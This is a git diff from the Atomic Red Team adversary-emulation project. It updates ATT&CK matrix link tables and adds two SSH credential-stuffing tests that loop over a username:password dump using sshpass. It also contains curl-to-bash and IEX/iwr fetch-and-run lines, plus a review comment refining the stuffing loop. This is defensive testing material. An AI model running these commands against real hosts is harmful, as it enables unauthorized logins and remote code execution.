-| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
@@ -43,7 +43,7 @@
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | | |
-| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | | | | | | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
@@ -76,10 +76,10 @@
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | |
-| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | |
| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 2448302b..5cb56258 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -5,7 +5,7 @@
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -15,12 +15,12 @@
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Software Deployment Tools](../../T1072/T1072.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
@@ -57,7 +57,7 @@
| | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 35161db6..7160e201 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -831,7 +831,72 @@ credential-access:
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
- atomic_tests: []
+ identifier: T1110.004
+ atomic_tests:
+ - name: SSH Credential Stuffing From Linux
+ auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
+ description: 'Using username,password combination from a password dump to login
+ over SSH.
+
+'
+ supported_platforms:
+ - linux
+ input_arguments:
+ target_host:
+ description: IP Address / Hostname you want to target.
+ type: String
+ default: localhost
+ dependency_executor_name: bash
+ dependencies:
+ - description: 'Requires SSHPASS
+
+'
+ prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
+ 1; fi;
+
+'
+ get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] ||
+ [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo
+ apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+
+'
+ executor:
+ name: bash
+ elevation_required: false
+ command: |
+ cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+ - name: SSH Credential Stuffing From MacOS
+ auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+ description: 'Using username,password combination from a password dump to login
+ over SSH.
+
+'
+ supported_platforms:
+ - macos
+ input_arguments:
+ target_host:
+ description: IP Address / Hostname you want to target.
+ type: String
+ default: localhost
+ dependency_executor_name: bash
+ dependencies:
+ - description: 'Requires SSHPASS
+
+'
+ prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
+ 1; fi;
+
+'
+ get_prereq_command: |
+ /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+ brew install hudochenkov/sshpass/sshpass
+ executor:
+ name: bash
+ elevation_required: false
+ command: |
+ cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1552.001:
technique:
id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc
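Review bot: The executors at L1060 and L1091 extract the password with `cut -d":" -f2`, so any entry whose password contains a colon is silently truncated; `cut -d":" -f2-` keeps the remainder of the line. The inner `ssh` call is given no remote command, so the first successful login opens an interactive shell and the loop stops advancing instead of recording the hit — appending a trivial remote command such as `exit` keeps the test bounded. Neither test declares a `cleanup_command`, so the staged `/tmp/credstuffuserpass.txt` and any known_hosts entry written by `StrictHostKeyChecking=no` persist after the run; `cleanup_command: rm -f /tmp/credstuffuserpass.txt` would at least remove the copied credential list. If index.yaml is generated from the per-technique YAML, these fixes belong in the T1110.004 source file rather than here.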
@@ -1048,13 +1113,40 @@ credential-access:
'
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
